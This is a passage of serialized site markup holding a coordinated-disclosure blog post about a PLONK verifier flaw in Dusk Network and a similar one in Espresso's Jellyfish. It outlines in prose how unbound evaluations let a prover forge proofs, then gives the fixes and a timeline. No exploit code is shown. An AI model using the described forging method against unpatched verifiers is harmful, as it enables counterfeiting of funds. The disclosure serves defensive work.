(",{"type":27,"tag":47,"props":152745,"children":152747},{"href":152565,"rel":152746},[51],[152748],{"type":33,"value":152569},{"type":33,"value":28014},{"type":27,"tag":1232,"props":152751,"children":152752},{},[152753,152755,152842,152844,152936,152937,152944],{"type":33,"value":152754},"There is a fourth permutation commitment ",{"type":27,"tag":84,"props":152756,"children":152758},{"className":152757},[11266,11267],[152759],{"type":27,"tag":207,"props":152760,"children":152762},{"className":152761},[11272],[152763],{"type":27,"tag":207,"props":152764,"children":152766},{"className":152765,"ariaHidden":11278},[11277],[152767],{"type":27,"tag":207,"props":152768,"children":152770},{"className":152769},[11283],[152771,152775,152780,152837],{"type":27,"tag":207,"props":152772,"children":152774},{"className":152773,"style":11393},[11288],[],{"type":27,"tag":207,"props":152776,"children":152778},{"className":152777},[28989],[152779],{"type":33,"value":11019},{"type":27,"tag":207,"props":152781,"children":152783},{"className":152782},[11294],[152784,152789],{"type":27,"tag":207,"props":152785,"children":152787},{"className":152786,"style":100750},[11294,28860],[152788],{"type":33,"value":151219},{"type":27,"tag":207,"props":152790,"children":152792},{"className":152791},[11309],[152793],{"type":27,"tag":207,"props":152794,"children":152796},{"className":152795},[11314,28914],[152797,152826],{"type":27,"tag":207,"props":152798,"children":152800},{"className":152799},[11319],[152801,152821],{"type":27,"tag":207,"props":152802,"children":152804},{"className":152803,"style":100316},[11324],[152805],{"type":27,"tag":207,"props":152806,"children":152807},{"style":100797},[152808,152812],{"type":27,"tag":207,"props":152809,"children":152811},{"className":152810,"style":11334},[11333],[],{"type":27,"tag":207,"props":152813,"children":152815},{"className":152814},[11339,11340,11341,11342],[152816],{"type":27,"tag":207,"props":152817,"children":152819},{"className":152818},[11294,11342],[152820],{"type":33,"value":1693},{"type":27,"tag":207,"props":152822,"children":152824},{"className":152823},[29017],[152825],{"type":33,"value":29020},{"type":27,"tag":207,"props":152827,"children":152829},{"className":152828},[11319],[152830],{"type":27,"tag":207,"props":152831,"children":152833},{"className":152832,"style":100347},[11324],[152834],{"type":27,"tag":207,"props":152835,"children":152836},{},[],{"type":27,"tag":207,"props":152838,"children":152840},{"className":152839},[29011],[152841],{"type":33,"value":22686},{"type":33,"value":152843}," in the verifier key, but the verifier uses the commitment itself inside the linearization MSM rather than trusting a prover-supplied scalar ",{"type":27,"tag":84,"props":152845,"children":152847},{"className":152846},[11266,11267],[152848],{"type":27,"tag":207,"props":152849,"children":152851},{"className":152850},[11272],[152852],{"type":27,"tag":207,"props":152853,"children":152855},{"className":152854,"ariaHidden":11278},[11277],[152856],{"type":27,"tag":207,"props":152857,"children":152859},{"className":152858},[11283],[152860,152864,152921,152926,152931],{"type":27,"tag":207,"props":152861,"children":152863},{"className":152862,"style":11393},[11288],[],{"type":27,"tag":207,"props":152865,"children":152867},{"className":152866},[11294],[152868,152873],{"type":27,"tag":207,"props":152869,"children":152871},{"className":152870,"style":100750},[11294,28860],[152872],{"type":33,"value":151219},{"type":27,"tag":207,"props":152874,"children":152876},{"className":152875},[11309],[152877],{"type":27,"tag":207,"props":152878,"children":152880},{"className":152879},[11314,28914],[152881,152910],{"type":27,"tag":207,"props":152882,"children":152884},{"className":152883},[11319],[152885,152905],{"type":27,"tag":207,"props":152886,"children":152888},{"className":152887,"style":100316},[11324],[152889],{"type":27,"tag":207,"props":152890,"children":152891},{"style":100797},[152892,152896],{"type":27,"tag":207,"props":152893,"children":152895},{"className":152894,"style":11334},[11333],[],{"type":27,"tag":207,"props":152897,"children":152899},{"className":152898},[11339,11340,11341,11342],[152900],{"type":27,"tag":207,"props":152901,"children":152903},{"className":152902},[11294,11342],[152904],{"type":33,"value":1693},{"type":27,"tag":207,"props":152906,"children":152908},{"className":152907},[29017],[152909],{"type":33,"value":29020},{"type":27,"tag":207,"props":152911,"children":152913},{"className":152912},[11319],[152914],{"type":27,"tag":207,"props":152915,"children":152917},{"className":152916,"style":100347},[11324],[152918],{"type":27,"tag":207,"props":152919,"children":152920},{},[],{"type":27,"tag":207,"props":152922,"children":152924},{"className":152923},[28989],[152925],{"type":33,"value":1343},{"type":27,"tag":207,"props":152927,"children":152929},{"className":152928,"style":120808},[11294,28860],[152930],{"type":33,"value":120811},{"type":27,"tag":207,"props":152932,"children":152934},{"className":152933},[29011],[152935],{"type":33,"value":10416},{"type":33,"value":686},{"type":27,"tag":47,"props":152938,"children":152941},{"href":152939,"rel":152940},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/widget/permutation/verifierkey.rs#L24-L104",[51],[152942],{"type":33,"value":152943},"permutation verifier key",{"type":33,"value":28014},{"type":27,"tag":36,"props":152946,"children":152947},{},[152948,152950,152960],{"type":33,"value":152949},"The four selector evaluations fit neither of these safe patterns: they are prover-supplied scalars, they are used directly by verifier code, and they never appear in ",{"type":27,"tag":47,"props":152951,"children":152954},{"href":152952,"rel":152953},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L361-L373",[51],[152955],{"type":27,"tag":84,"props":152956,"children":152958},{"className":152957},[],[152959],{"type":33,"value":152401},{"type":33,"value":152961},", which leaves the master equation underconstrained.",{"type":27,"tag":36,"props":152963,"children":152964},{},[152965],{"type":27,"tag":126,"props":152966,"children":152969},{"alt":152967,"src":152968},"structural_trust_boundary","/posts/dusk-commitment-issues/structural_trust_boundary.svg",[],{"type":27,"tag":26063,"props":152971,"children":152972},{},[],{"type":27,"tag":28,"props":152974,"children":152976},{"id":152975},"the-exploitation",[152977],{"type":33,"value":152978},"The exploitation",{"type":27,"tag":36,"props":152980,"children":152981},{},[152982],{"type":33,"value":152983},"Since the selector evaluations are free variables, the verification equation becomes a linear equation the prover can solve after the fact.",{"type":27,"tag":36,"props":152985,"children":152986},{},[152987,152989,152995,152997,153002,153004,153009,153011,153017],{"type":33,"value":152988},"The prover commits to arbitrary witness polynomials, without needing a valid witness, and arbitrary quotient polynomials, where small random linear polynomials suffice. It follows the honest protocol through all commitment rounds, deriving the same challenges the verifier will. After seeing ",{"type":27,"tag":84,"props":152990,"children":152992},{"className":152991},[],[152993],{"type":33,"value":152994},"z_challenge",{"type":33,"value":152996},", it computes what the linearization polynomial ",{"type":27,"tag":942,"props":152998,"children":152999},{},[153000],{"type":33,"value":153001},"should",{"type":33,"value":153003}," evaluate to for the pairing check to pass, then solves for ",{"type":27,"tag":84,"props":153005,"children":153007},{"className":153006},[],[153008],{"type":33,"value":152522},{"type":33,"value":153010},", the single free variable that makes the verification equation balance (setting ",{"type":27,"tag":84,"props":153012,"children":153014},{"className":153013},[],[153015],{"type":33,"value":153016},"q_c_eval = q_l_eval = q_r_eval = 0",{"type":33,"value":28014},{"type":27,"tag":36,"props":153019,"children":153020},{},[153021],{"type":27,"tag":126,"props":153022,"children":153025},{"alt":153023,"src":153024},"exploit_algebra","/posts/dusk-commitment-issues/exploit_algebra.svg",[],{"type":27,"tag":36,"props":153027,"children":153028},{},[153029,153031,153071,153073,153098,153100,153105],{"type":33,"value":153030},"To achieve this one may compute the linearization polynomial ",{"type":27,"tag":84,"props":153032,"children":153034},{"className":153033},[11266,11267],[153035],{"type":27,"tag":207,"props":153036,"children":153038},{"className":153037},[11272],[153039],{"type":27,"tag":207,"props":153040,"children":153042},{"className":153041,"ariaHidden":11278},[11277],[153043],{"type":27,"tag":207,"props":153044,"children":153046},{"className":153045},[11283],[153047,153051,153056,153061,153066],{"type":27,"tag":207,"props":153048,"children":153050},{"className":153049,"style":11393},[11288],[],{"type":27,"tag":207,"props":153052,"children":153054},{"className":153053,"style":100264},[11294,28860],[153055],{"type":33,"value":101083},{"type":27,"tag":207,"props":153057,"children":153059},{"className":153058},[28989],[153060],{"type":33,"value":1343},{"type":27,"tag":207,"props":153062,"children":153064},{"className":153063},[11294,28860],[153065],{"type":33,"value":26546},{"type":27,"tag":207,"props":153067,"children":153069},{"className":153068},[29011],[153070],{"type":33,"value":10416},{"type":33,"value":153072}," with all selectors set to zero, evaluating it at ",{"type":27,"tag":84,"props":153074,"children":153076},{"className":153075},[11266,11267],[153077],{"type":27,"tag":207,"props":153078,"children":153080},{"className":153079},[11272],[153081],{"type":27,"tag":207,"props":153082,"children":153084},{"className":153083,"ariaHidden":11278},[11277],[153085],{"type":27,"tag":207,"props":153086,"children":153088},{"className":153087},[11283],[153089,153093],{"type":27,"tag":207,"props":153090,"children":153092},{"className":153091,"style":118092},[11288],[],{"type":27,"tag":207,"props":153094,"children":153096},{"className":153095,"style":120808},[11294,28860],[153097],{"type":33,"value":120811},{"type":33,"value":153099},", and comparing to the target value; the difference divided by the coefficient of ",{"type":27,"tag":84,"props":153101,"children":153103},{"className":153102},[],[153104],{"type":33,"value":152522},{"type":33,"value":153106}," gives the required value in a single field division.",{"type":27,"tag":26063,"props":153108,"children":153109},{},[],{"type":27,"tag":28,"props":153111,"children":153113},{"id":153112},"impact-on-dusk-network",[153114],{"type":33,"value":153115},"Impact on Dusk Network",{"type":27,"tag":36,"props":153117,"children":153118},{},[153119,153121,153128],{"type":33,"value":153120},"PLONK is the sole gatekeeper for Phoenix-specific correctness claims: note membership, ownership, note commitments, sender-authorship, and balance integrity are encoded entirely in the circuit. Rusk does check other preconditions such as nullifier uniqueness before it verifies the proof (",{"type":27,"tag":47,"props":153122,"children":153125},{"href":153123,"rel":153124},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/rusk/src/lib/node/vm.rs#L153-L184",[51],[153126],{"type":33,"value":153127},"preverify path",{"type":33,"value":153129},"), but for the claims inside the proof there is no secondary validation path. With forged proofs, an attacker could:",{"type":27,"tag":12719,"props":153131,"children":153132},{},[153133,153138,153143],{"type":27,"tag":1232,"props":153134,"children":153135},{},[153136],{"type":33,"value":153137},"Inflate the token supply by fabricating input notes that do not exist in the note tree, with arbitrary values. The forged proof convinces the network these notes are real, and the attacker mints DUSK out of nothing, ready to transfer to honest users or exchanges.",{"type":27,"tag":1232,"props":153139,"children":153140},{},[153141],{"type":33,"value":153142},"Forge spends that bypass the ownership, membership, and balance checks that normally make a Phoenix input note valid.",{"type":27,"tag":1232,"props":153144,"children":153145},{},[153146],{"type":33,"value":153147},"Move forged shielded funds through honest wallets, because once a forged Phoenix transaction is accepted, the resulting shielded outputs are not distinguishable from legitimate Phoenix outputs at the protocol level.",{"type":27,"tag":36,"props":153149,"children":153150},{},[153151],{"type":33,"value":153152},"We demonstrated this with a full end-to-end proof-of-concept on a local Dusk testnet:",{"type":27,"tag":12719,"props":153154,"children":153155},{},[153156,153161,153171,153183,153188],{"type":27,"tag":1232,"props":153157,"children":153158},{},[153159],{"type":33,"value":153160},"Set up a single honest Rusk node and create two wallets (honest and malicious), both with balance 0",{"type":27,"tag":1232,"props":153162,"children":153163},{},[153164,153166],{"type":33,"value":153165},"The malicious wallet forges a PLONK proof to create ",{"type":27,"tag":12606,"props":153167,"children":153168},{},[153169],{"type":33,"value":153170},"2000 DUSK from nothing",{"type":27,"tag":1232,"props":153172,"children":153173},{},[153174,153176,153181],{"type":33,"value":153175},"The malicious wallet transfers ",{"type":27,"tag":12606,"props":153177,"children":153178},{},[153179],{"type":33,"value":153180},"1337 DUSK",{"type":33,"value":153182}," to the honest wallet using a normal (honestly-proved) transaction",{"type":27,"tag":1232,"props":153184,"children":153185},{},[153186],{"type":33,"value":153187},"The honest node validates both transactions and mines them into blocks",{"type":27,"tag":1232,"props":153189,"children":153190},{},[153191],{"type":33,"value":153192},"The honest wallet shows a confirmed balance of 1337 DUSK",{"type":27,"tag":36,"props":153194,"children":153195},{},[153196],{"type":27,"tag":126,"props":153197,"children":153200},{"alt":153198,"src":153199},"end_to_end","/posts/dusk-commitment-issues/end_to_end.svg",[],{"type":27,"tag":36,"props":153202,"children":153203},{},[153204,153206,153212,153214,153221],{"type":33,"value":153205},"At the time of discovery, DUSK's market cap was roughly ",{"type":27,"tag":47,"props":153207,"children":153209},{"href":148507,"rel":153208},[51],[153210],{"type":33,"value":153211},"~60M",{"type":33,"value":153213},". The entire shielded transaction layer was at risk. Because Phoenix is privacy-preserving, forged outputs accepted into the shielded pool would have been difficult to distinguish after the fact, similar to Neptune Cash with the ",{"type":27,"tag":47,"props":153215,"children":153218},{"href":153216,"rel":153217},"https://neptune.cash/articles/critical-vulnerability-disclosure",[51],[153219],{"type":33,"value":153220},"Triton VM vulnerability",{"type":33,"value":1041},{"type":27,"tag":26063,"props":153223,"children":153224},{},[],{"type":27,"tag":28,"props":153226,"children":153228},{"id":153227},"the-fix",[153229],{"type":33,"value":153230},"The fix",{"type":27,"tag":36,"props":153232,"children":153233},{},[153234],{"type":33,"value":153235},"The fix adds the four selector evaluations to the KZG batch opening check, so they are verified against the selector commitments already present in the verifier key:",{"type":27,"tag":1228,"props":153237,"children":153238},{},[153239,153284],{"type":27,"tag":1232,"props":153240,"children":153241},{},[153242,153244,153255,153257,153263,153264,153270,153271,153277,153278],{"type":33,"value":153243},"Extend ",{"type":27,"tag":47,"props":153245,"children":153248},{"href":153246,"rel":153247},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/compiler/prover.rs#L509",[51],[153249],{"type":27,"tag":84,"props":153250,"children":153252},{"className":153251},[],[153253],{"type":33,"value":153254},"compute_aggregate_witness",{"type":33,"value":153256}," on the prover side to also include ",{"type":27,"tag":84,"props":153258,"children":153260},{"className":153259},[],[153261],{"type":33,"value":153262},"q_arith",{"type":33,"value":1123},{"type":27,"tag":84,"props":153265,"children":153267},{"className":153266},[],[153268],{"type":33,"value":153269},"q_c",{"type":33,"value":1123},{"type":27,"tag":84,"props":153272,"children":153274},{"className":153273},[],[153275],{"type":33,"value":153276},"q_l",{"type":33,"value":4601},{"type":27,"tag":84,"props":153279,"children":153281},{"className":153280},[],[153282],{"type":33,"value":153283},"q_r",{"type":27,"tag":1232,"props":153285,"children":153286},{},[153287,153289,153299],{"type":33,"value":153288},"Add their evaluations to ",{"type":27,"tag":47,"props":153290,"children":153293},{"href":153291,"rel":153292},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L362",[51],[153294],{"type":27,"tag":84,"props":153295,"children":153297},{"className":153296},[],[153298],{"type":33,"value":152401},{"type":33,"value":153300}," on the verifier side, so they're checked against the commitments in the verifier key",{"type":27,"tag":36,"props":153302,"children":153303},{},[153304,153306,153313],{"type":33,"value":153305},"This was done in ",{"type":27,"tag":47,"props":153307,"children":153310},{"href":153308,"rel":153309},"https://github.com/dusk-network/plonk/commit/645265b748d2698bcb403b794fc2d58340b340f1",[51],[153311],{"type":33,"value":153312},"commit 645265b7",{"type":33,"value":153314},", which landed on February 14, 2026.",{"type":27,"tag":26063,"props":153316,"children":153317},{},[],{"type":27,"tag":28,"props":153319,"children":153321},{"id":153320},"why-was-this-missed",[153322],{"type":33,"value":153323},"Why was this missed?",{"type":27,"tag":36,"props":153325,"children":153326},{},[153327,153329,153336,153337,153344,153346,153353,153355,153362],{"type":33,"value":153328},"Dusk's stack had been heavily audited: a ",{"type":27,"tag":47,"props":153330,"children":153333},{"href":153331,"rel":153332},"https://github.com/dusk-network/audits/blob/main/core-audits/2023-12_plonk-audit-report_porter-adams.pdf",[51],[153334],{"type":33,"value":153335},"December 2023 audit of dusk-plonk",{"type":33,"value":131592},{"type":27,"tag":47,"props":153338,"children":153341},{"href":153339,"rel":153340},"https://github.com/dusk-network/audits/blob/main/core-audits/2024-09_phoenix-audit-report_jules-de-smit.pdf",[51],[153342],{"type":33,"value":153343},"September 2024 audit of Phoenix",{"type":33,"value":153345},", and a ",{"type":27,"tag":47,"props":153347,"children":153350},{"href":153348,"rel":153349},"https://github.com/dusk-network/audits/blob/main/core-audits/2024-09_rusk-node-library_oak-security.pdf",[51],[153351],{"type":33,"value":153352},"September 2024 Oak Security audit of the Rusk node library",{"type":33,"value":153354},". Dusk's public ",{"type":27,"tag":47,"props":153356,"children":153359},{"href":153357,"rel":153358},"https://dusk.network/news/audits-overview",[51],[153360],{"type":33,"value":153361},"audits overview",{"type":33,"value":153363}," summarizes the broader audit program. The bug still went unnoticed because it hides behind a very easy mental-model mistake.",{"type":27,"tag":36,"props":153365,"children":153366},{},[153367,153369,153374],{"type":33,"value":153368},"At the polynomial level, selectors are public circuit descriptions. A reviewer who keeps that standard PLONK model in mind will naturally think \"selectors are verifier-side\" and move on, overlooking the architectural deviation where Dusk's verifier started consuming prover-supplied selector ",{"type":27,"tag":942,"props":153370,"children":153371},{},[153372],{"type":33,"value":153373},"evaluations",{"type":33,"value":1041},{"type":27,"tag":36,"props":153376,"children":153377},{},[153378],{"type":33,"value":153379},"This was a pure proof-system bug, not a Phoenix-circuit bug; the circuit constraints themselves were correctly written. The failure occurred entirely because the verifier accepted proof fields that bypassed the fundamental invariant established earlier: they were neither locally computed nor cryptographically bound to an opening proof.",{"type":27,"tag":36,"props":153381,"children":153382},{},[153383],{"type":33,"value":153384},"The check for this class of bug is mechanical: enumerate every field in the proof's evaluation struct and verify that each one either appears in the opening proof batch or is computed locally by the verifier.",{"type":27,"tag":28,"props":153386,"children":153388},{"id":153387},"a-similar-bug-in-espresso-systems-jellyfish",[153389],{"type":33,"value":153390},"A similar bug in Espresso Systems' Jellyfish",{"type":27,"tag":36,"props":153392,"children":153393},{},[153394,153396,153403],{"type":33,"value":153395},"While investigating PLONK implementations, we found a similar vulnerability in ",{"type":27,"tag":47,"props":153397,"children":153400},{"href":153398,"rel":153399},"https://github.com/EspressoSystems/jellyfish/",[51],[153401],{"type":33,"value":153402},"jf-plonk",{"type":33,"value":153404}," by Espresso Systems. The exact mechanism is different, but the exploitation also boils down to variables that are used in the final check not being cryptographically bound.",{"type":27,"tag":36,"props":153406,"children":153407},{},[153408,153410,153417,153419,153430,153432,153457,153459,153484],{"type":33,"value":153409},"Jellyfish implements UltraPlonk, which extends standard PLONK with ",{"type":27,"tag":47,"props":153411,"children":153414},{"href":153412,"rel":153413},"https://eprint.iacr.org/2020/315",[51],[153415],{"type":33,"value":153416},"Plookup",{"type":33,"value":153418}," lookup arguments. Plookup adds 15 polynomial evaluations to the proof. The function ",{"type":27,"tag":47,"props":153420,"children":153423},{"href":153421,"rel":153422},"https://github.com/EspressoSystems/jellyfish/blob/83e62ed43140d251f8a972033fdd9ddb717c66d7/plonk/src/transcript/mod.rs#L156-L166",[51],[153424],{"type":27,"tag":84,"props":153425,"children":153427},{"className":153426},[],[153428],{"type":33,"value":153429},"append_plookup_evaluations",{"type":33,"value":153431}," was supposed to add all 15 to the Fiat-Shamir transcript before the batching challenge ",{"type":27,"tag":84,"props":153433,"children":153435},{"className":153434},[11266,11267],[153436],{"type":27,"tag":207,"props":153437,"children":153439},{"className":153438},[11272],[153440],{"type":27,"tag":207,"props":153441,"children":153443},{"className":153442,"ariaHidden":11278},[11277],[153444],{"type":27,"tag":207,"props":153445,"children":153447},{"className":153446},[11283],[153448,153452],{"type":27,"tag":207,"props":153449,"children":153451},{"className":153450,"style":118092},[11288],[],{"type":27,"tag":207,"props":153453,"children":153455},{"className":153454,"style":100750},[11294,28860],[153456],{"type":33,"value":121155},{"type":33,"value":153458}," is derived. Instead, it only added 6 of the 15, and the remaining 9 evaluations are used in the batched verification check but don't influence ",{"type":27,"tag":84,"props":153460,"children":153462},{"className":153461},[11266,11267],[153463],{"type":27,"tag":207,"props":153464,"children":153466},{"className":153465},[11272],[153467],{"type":27,"tag":207,"props":153468,"children":153470},{"className":153469,"ariaHidden":11278},[11277],[153471],{"type":27,"tag":207,"props":153472,"children":153474},{"className":153473},[11283],[153475,153479],{"type":27,"tag":207,"props":153476,"children":153478},{"className":153477,"style":118092},[11288],[],{"type":27,"tag":207,"props":153480,"children":153482},{"className":153481,"style":100750},[11294,28860],[153483],{"type":33,"value":121155},{"type":33,"value":153485},", so the prover can adjust them after the fact to make the check pass.",{"type":27,"tag":36,"props":153487,"children":153488},{},[153489,153491,153497,153499,153505],{"type":33,"value":153490},"The attack requires modifying a single evaluation (",{"type":27,"tag":84,"props":153492,"children":153494},{"className":153493},[],[153495],{"type":33,"value":153496},"key_table_next_eval",{"type":33,"value":153498},") by ",{"type":27,"tag":84,"props":153500,"children":153502},{"className":153501},[],[153503],{"type":33,"value":153504},"delta / (u * v^3)",{"type":33,"value":153506}," to close the gap between the true and expected batched evaluation, which, like the Dusk exploit, reduces to a single field division.",{"type":27,"tag":36,"props":153508,"children":153509},{},[153510,153512,153519,153521,153532],{"type":33,"value":153511},"To our knowledge, Jellyfish's UltraPlonk mode is not currently deployed in production. ",{"type":27,"tag":47,"props":153513,"children":153516},{"href":153514,"rel":153515},"https://github.com/EspressoSystems/jellyfish/pull/867",[51],[153517],{"type":33,"value":153518},"PR #867",{"type":33,"value":153520}," fixed the issue and was tagged as ",{"type":27,"tag":47,"props":153522,"children":153525},{"href":153523,"rel":153524},"https://github.com/EspressoSystems/jellyfish/tree/jf-plonk-v0.8.0",[51],[153526],{"type":27,"tag":84,"props":153527,"children":153529},{"className":153528},[],[153530],{"type":33,"value":153531},"jf-plonk-v0.8.0",{"type":33,"value":153533}," on March 18, 2026.",{"type":27,"tag":26063,"props":153535,"children":153536},{},[],{"type":27,"tag":28,"props":153538,"children":153540},{"id":153539},"toward-standardization",[153541],{"type":33,"value":153542},"Toward standardization",{"type":27,"tag":36,"props":153544,"children":153545},{},[153546,153548,153555],{"type":33,"value":153547},"The fact that two independent PLONK implementations contain the same class of bug, and that ",{"type":27,"tag":47,"props":153549,"children":153552},{"href":153550,"rel":153551},"https://osec.io/blog/2026-03-03-zkvms-unfaithful-claims/",[51],[153553],{"type":33,"value":153554},"similar patterns appear across zkVMs",{"type":33,"value":153556},", suggests this isn't a problem that individual audits alone can solve. The check described above (diff \"evaluations used\" against \"evaluations bound\") is mechanical and could be built into development tooling, CI pipelines, or standardized PLONK verification specifications.",{"type":27,"tag":36,"props":153558,"children":153559},{},[153560],{"type":33,"value":153561},"We're in early discussions with the Dusk team and other stakeholders about what a PLONK standardization effort could look like: a curve-agnostic, backend-agnostic specification of the verification protocol that makes invariants like evaluation binding explicit and checkable.",{"type":27,"tag":36,"props":153563,"children":153564},{},[153565],{"type":33,"value":153566},"The status quo, where each team implements their own PLONK variant from the paper and hopes the auditor catches what they missed, is fragile. A shared, well-reviewed verification spec would reduce the surface area for these bugs and give auditors a concrete checklist to verify against.",{"type":27,"tag":28,"props":153568,"children":153569},{"id":68055},[153570],{"type":33,"value":153571},"Disclosure timeline",{"type":27,"tag":62980,"props":153573,"children":153574},{},[153575,153591],{"type":27,"tag":130201,"props":153576,"children":153577},{},[153578],{"type":27,"tag":130205,"props":153579,"children":153580},{},[153581,153586],{"type":27,"tag":130209,"props":153582,"children":153583},{},[153584],{"type":33,"value":153585},"Date",{"type":27,"tag":130209,"props":153587,"children":153588},{},[153589],{"type":33,"value":153590},"Event",{"type":27,"tag":130229,"props":153592,"children":153593},{},[153594,153607,153620,153632,153658,153678],{"type":27,"tag":130205,"props":153595,"children":153596},{},[153597,153602],{"type":27,"tag":130236,"props":153598,"children":153599},{},[153600],{"type":33,"value":153601},"2026-02-13",{"type":27,"tag":130236,"props":153603,"children":153604},{},[153605],{"type":33,"value":153606},"Dusk vulnerability reported",{"type":27,"tag":130205,"props":153608,"children":153609},{},[153610,153615],{"type":27,"tag":130236,"props":153611,"children":153612},{},[153613],{"type":33,"value":153614},"2026-02-14",{"type":27,"tag":130236,"props":153616,"children":153617},{},[153618],{"type":33,"value":153619},"Dusk acknowledged",{"type":27,"tag":130205,"props":153621,"children":153622},{},[153623,153627],{"type":27,"tag":130236,"props":153624,"children":153625},{},[153626],{"type":33,"value":153614},{"type":27,"tag":130236,"props":153628,"children":153629},{},[153630],{"type":33,"value":153631},"Dusk fix committed",{"type":27,"tag":130205,"props":153633,"children":153634},{},[153635,153640],{"type":27,"tag":130236,"props":153636,"children":153637},{},[153638],{"type":33,"value":153639},"2026-02-27",{"type":27,"tag":130236,"props":153641,"children":153642},{},[153643,153645,153656],{"type":33,"value":153644},"Public ",{"type":27,"tag":47,"props":153646,"children":153649},{"href":153647,"rel":153648},"https://github.com/dusk-network/rusk/releases/tag/dusk-rusk-1.6.0",[51],[153650],{"type":27,"tag":84,"props":153651,"children":153653},{"className":153652},[],[153654],{"type":33,"value":153655},"dusk-rusk-1.6.0",{"type":33,"value":153657}," release published",{"type":27,"tag":130205,"props":153659,"children":153660},{},[153661,153666],{"type":27,"tag":130236,"props":153662,"children":153663},{},[153664],{"type":33,"value":153665},"2026-03-16",{"type":27,"tag":130236,"props":153667,"children":153668},{},[153669,153671,153677],{"type":33,"value":153670},"Jellyfish fix PR opened (",{"type":27,"tag":47,"props":153672,"children":153674},{"href":153514,"rel":153673},[51],[153675],{"type":33,"value":153676},"#867",{"type":33,"value":10416},{"type":27,"tag":130205,"props":153679,"children":153680},{},[153681,153686],{"type":27,"tag":130236,"props":153682,"children":153683},{},[153684],{"type":33,"value":153685},"2026-03-18",{"type":27,"tag":130236,"props":153687,"children":153688},{},[153689,153691,153696,153698],{"type":33,"value":153690},"Jellyfish fix merged in ",{"type":27,"tag":47,"props":153692,"children":153694},{"href":153514,"rel":153693},[51],[153695],{"type":33,"value":153676},{"type":33,"value":153697}," and tagged as ",{"type":27,"tag":47,"props":153699,"children":153701},{"href":153523,"rel":153700},[51],[153702],{"type":27,"tag":84,"props":153703,"children":153705},{"className":153704},[],[153706],{"type":33,"value":153531},{"type":27,"tag":28,"props":153708,"children":153710},{"id":153709},"acknowledgements",[153711],{"type":33,"value":153712},"Acknowledgements",{"type":27,"tag":36,"props":153714,"children":153715},{},[153716],{"type":33,"value":153717},"We thank the Dusk team for responding within a day, coordinating the fix transparently, and engaging on the broader standardization question. We also thank the Espresso Systems team for turning around the Jellyfish patch in under a week.",{"title":7,"searchDepth":244,"depth":244,"links":153719},[153720,153727,153728,153729,153730,153731,153732,153733,153734,153735,153736,153737],{"id":148537,"depth":244,"text":148540,"children":153721},[153722,153723,153724,153725,153726],{"id":148562,"depth":270,"text":148565},{"id":149365,"depth":270,"text":149368},{"id":150563,"depth":270,"text":150566},{"id":150593,"depth":270,"text":150596},{"id":150874,"depth":270,"text":150877},{"id":151607,"depth":244,"text":151610},{"id":151745,"depth":244,"text":151748},{"id":97519,"depth":244,"text":152376},{"id":152975,"depth":244,"text":152978},{"id":153112,"depth":244,"text":153115},{"id":153227,"depth":244,"text":153230},{"id":153320,"depth":244,"text":153323},{"id":153387,"depth":244,"text":153390},{"id":153539,"depth":244,"text":153542},{"id":68055,"depth":244,"text":153571},{"id":153709,"depth":244,"text":153712},"content:blog:2026-04-30-unverified-evaluations-dusk-plonk.md","blog/2026-04-30-unverified-evaluations-dusk-plonk.md","blog/2026-04-30-unverified-evaluations-dusk-plonk",1777565548937]